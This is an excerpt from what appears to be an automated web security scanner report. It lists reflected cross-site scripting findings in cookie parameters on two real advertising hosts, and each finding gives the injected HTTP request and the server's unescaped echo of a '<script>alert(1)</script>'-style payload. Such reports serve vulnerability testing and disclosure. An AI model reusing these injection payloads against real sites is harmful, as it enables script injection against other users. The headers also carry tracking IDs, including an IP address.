Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
itExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&64e2e<script>alert(1)</script>5bd065759a6', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.492. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84068139 cookie is copied into the HTML document as plain text between tags. The payload fc20d<script>alert(1)</script>d332a9dc906 was submitted in the ar_p84068139 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&fc20d<script>alert(1)</script>d332a9dc906; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&fc20d<script>alert(1)</script>d332a9dc906', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.
...[SNIP]...

1.493. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84532700 cookie is copied into the HTML document as plain text between tags. The payload e039c<script>alert(1)</script>e6c63100fcf was submitted in the ar_p84532700 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&e039c<script>alert(1)</script>e6c63100fcf; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&e039c<script>alert(1)</script>e6c63100fcf', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->
...[SNIP]...

1.494. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload ecc7f<script>alert(1)</script>d67fa7f6f9b was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&ecc7f<script>alert(1)</script>d67fa7f6f9b; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&ecc7f<script>alert(1)</script>d67fa7f6f9b=&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&ecc7f<script>alert(1)</script>d67fa7f6f9b', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

1.495. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p86183782 cookie is copied into the HTML document as plain text between tags. The payload f53aa<script>alert(1)</script>f1a0313fbec was submitted in the ar_p86183782 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.496. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_s_p84053757 cookie is copied into the HTML document as plain text between tags. The payload 5a71a<script>alert(1)</script>5abd27d3fc1 was submitted in the ar_s_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->12976066755a71a<script>alert(1)</script>5abd27d3fc1; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
p=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->12976066755a71a<script>alert(1)</script>5abd27d3fc1', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sa
...[SNIP]...

1.497. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f097"-alert(1)-"548f1a5dacf was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
